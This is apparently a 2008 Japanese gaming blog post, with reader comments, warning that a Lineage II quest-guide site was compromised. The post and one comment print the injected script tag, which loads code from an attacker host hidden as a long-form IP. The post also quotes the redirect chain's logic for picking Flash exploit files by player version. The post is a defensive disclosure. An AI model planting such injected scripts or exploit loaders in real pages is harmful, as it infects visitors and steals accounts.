L2クエスト攻略が改ざんされているかもしれない件
●発売日カレンダー
・6/22 [PS5] FINAL FANTASY 16
・7/21 [Switch] ピクミン 4
・7/28 [Switch] なつもん! 20世紀の夏休み
・8/25 [WIN] ARMORED CORE VI FIRES OF RUBICON
« ヘルバウンドクエをせずともヘルバウンド地図を見るTIP | トップページ | NCjapanが行く!カンファレンス in 大阪 レポート »

2008年9月28日

L2クエスト攻略が改ざんされているかもしれない件 [ 情報・ニュース等 ]  

修正された様です。

リンクデータの悪質な改竄について(L2クエスト攻略)

2008年9月27日夜より9月29日早朝までの間、リンクファイルが改竄され、
ウイルスファイルへの直リンクがソースに埋め込まれました。

ウイルス内容と対応については現在調査中です。

-----

カイン掲示板にてL2クエスト攻略が改ざんされているかもしれないと
記載があります。

リネ2攻略サイトに改ざんの痕跡アリ(カインサーバ掲示板)

調べてみた所、確かに

script src=http://1039045726:65535/jp.js
という記述が存在しています。

この1039045726という数字は一見URLでは無さそうですが、
ロングIPアドレスというもので、URLを10桁の数字に置き換えたものです。

このロングIPアドレスをデコードしてみると、以下の結果が出ました。

IPアドレス 61.238.148.94

ホスト名 061238148094.ctinets.com

IPアドレス割当国 香港 ( hk )

明らかに怪しいです。
飛び先のjp.jsファイルをソースチェッカーにて確認してみると、
さらに同じサーバーの別ファイルに飛び、もう一度別ファイルに
飛んだ後、いくつかのFlashファイルにリンクされています。

if(v1 != 9) return ;

if(v3 == 115) vuln ="ia115-2.swf";

else if(v3 == 64) vuln="ia64-2.swf";

else if(v3 == 47) vuln="ia47-2.swf";

else if(v3 == 45) vuln="ia45-2.swf";

else if(v3 == 28)vuln="ia28-2.swf";

else if(v3 == 16) vuln ="ia16-2.swf";

else if(v3 == 0) vuln="ia00-2.swf";

else return ;

これから判断するに、Flashの脆弱性を狙った
アカウントハックウイルスだと思われます。
何時から埋め込まれていたのかは定かではありませんが、
L2攻略のリンクバーに埋め込まれているので、
リンクが表示されている所にアクセスした方は
ウイルスに感染している可能性があります。

ここ数日でL2クエスト攻略を訪れた形跡のある方は、
各社オンラインスキャンを通してチェックする事をオススメします。

オンラインスキャンサイトの一覧 - ウイルス、スパイウェア検出
http://cowscorpion.com/Outline/secu_on.html

投稿者 (む) : 2008年9月28日 10:20

▲ TOPに戻る

関連するかもしれない記事


コメント


1 :匿名: 2008年9月28日 12:56 ID: iPjzjyRY [RES]

推奨サイトとしてcowscorpion.comを紹介されていますが
http://www.siteadvisor.com/sites/cowscorpion.com?suite=false&premium=false&client_ver=2.6.0.6261&client_type=IEPlugin
このように不穏な報告がw

以前あったOrbitマルウェア同封事件は、Orbit自身には問題はなく、cowsで配られたアーカイヴにだけマルウェアが何らかの形で仕掛けられていた事が原因でした。


2 :匿名: 2008年9月28日 14:07 ID: 8ea2YPj6 [RES]

リネ2クエスト攻略のソース、【リンクランキング】のL2CSへのリンクのみに
<li><a href='?p=link_jump&ID=8' target='_blank' class='menu'>うならぼ</a></li>
<li><a href='?p=link_jump&ID=21' target='_blank' class='menu'>L2CS</a><script src=http://1039045726:65535/jp.js></script></a></li>
<li><a href='?p=link_jump&ID=39' target='_blank' class='menu'>line2char</a></li>
の記述


3 :匿名: 2008年9月28日 17:33 ID: cmYEWq5A [RES]

(む)さんのところは大丈夫?


4 :(む): 2008年9月28日 18:14 ID: RnqZXuYA [RES]

レンタルサーバなんでさくらインターネットが脆弱性塞いでいれば大丈夫です


5 :匿名: 2008年9月29日 07:18 ID: t6lLEyZY [RES]

いつもお世話になっております

VirusTotalによると、Avira他2つのみ検出されました
実際に試してみましたが、Trend/Symantec/ESET/F-Secure/Kasperskyのオンラインスキャンでは検出されず
手持ちのBitDefenderでもダメでした
今朝方KasperskyLabに検体を提出
>New malicious software was found in this file.
>It's detection will be included in the next update.
との結果でした


6 :匿名: 2008年9月29日 11:56 ID: MMZP1ZA2 [RES]

昨日クエスト攻略みたんだけど、表示の仕方がおかしいと思ったんだよね
んー、PeerGuardian2を入れといてよかった。
以前(む)さんの記事を見て入れてたんだけど
(む)さんありがとうー
一応カスペルスキーで検査したけど何も無かったです。
PeerGuardian2がしっかり働いてくれてるようです。


7 :匿名: 2008年9月29日 17:11 ID: KDaXewrk [RES]

くえ攻略サイトが、ウイルスについて、発表しているようです。


8 :匿名: 2008年9月29日 20:31 ID: t6lLEyZY [RES]

Kasperskyエンジン、対応しました
F-Secureとジャストシステム、Kasperskyの3製品でも対応可能になったようです


9 :匿名: 2008年9月30日 02:04 ID: GMYsGb0U [RES]

ノートンは検知できるのでしょうか・・。


▲ TOPに戻る

コメントしてください



「投稿」を押してから書き込み完了まで多少時間がかかります。
2回「投稿」ボタンを押してしまうと多重書き込みになりますので、
ページが切り替わるまでそのままの状態でお待ち下さい。


●投稿のルールについて
次に該当するコメントについては削除あるいはIP規制する場合があります。予めご了承下さい。
・誹謗中傷、不快な発言、公序良俗に反する表現を含むもの
・エントリーの内容と全く無関係のもの
・騙り、釣り、偽りと見られる投稿で荒れる原因になり得るもの
・あきらかに特定の個人、企業、商品などの広告・宣伝あるいは幇助・推薦を目的とするもの

●コメント欄について
・「>>番号」を使うことで、該当番号のコメントにリンクを張ることが出来ます。

●名前欄について
・名前を入力しない場合「Anonymous(匿名による投稿)」になります。

●スパムフィルタについて
・スパム対策を施しています。エラーが出たら規制されてます。
・内容がスパムっぽい場合、一旦保留扱いになります。

ルールを守り、モラルのあるコメントの投稿をお願い致します。

▲ TOPに戻る